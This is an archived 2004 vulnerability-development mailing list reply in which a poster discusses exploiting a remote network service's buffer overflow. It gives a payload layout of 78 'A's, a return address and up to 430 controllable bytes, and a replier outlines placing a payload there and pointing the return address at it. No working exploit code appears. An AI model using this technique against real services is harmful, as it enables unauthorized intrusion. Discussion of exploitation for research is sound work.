Vulnerability Development mailing list archives
Re: Exploiting network services question
From: just-a-nick () gmx net
Date: Tue, 21 Dec 2004 20:21:19 +0100 (MET)
James Longstreet wrote:
On Mon, 13 Dec 2004 just-a-nick () gmx net wrote:I have a question regarding the exploitation of network services. If I send the following string to a service ["A"x78]["abcd"][junk - up to 430 bytes]
I'm not sure I understand your question. Does the value you put in for eip have to be alphabetic, or is the "abcd" simply notation for "anything I want?"
It is (nearly) anything I want, it has to be printable...
Both are exploitable -- at least theoretically. If the return address can be anything you want, and if that 430 bytes of junk is also controlled by you, put a payload there. Find out the address of that payload (hint: use gdb), and replace "abcd" with that address.
But the service is remote, so I can't use gdb... Is there an elegant way to exploit this kind of vulnerabilities or do I have to brute-force it? -- +++ Sparen Sie mit GMX DSL +++ http://www.gmx.net/de/go/dsl AKTION für Wechsler: DSL-Tarife ab 3,99 EUR/Monat + Startguthaben
Current thread:
- Exploiting network services question just-a-nick (Dec 13)
- <Possible follow-ups>
- Re: Exploiting network services question Vade 79 (Dec 13)
- Re: Exploiting network services question James Longstreet (Dec 21)
- Re: Exploiting network services question just-a-nick (Dec 23)
- Re: Exploiting network services question James Longstreet (Dec 27)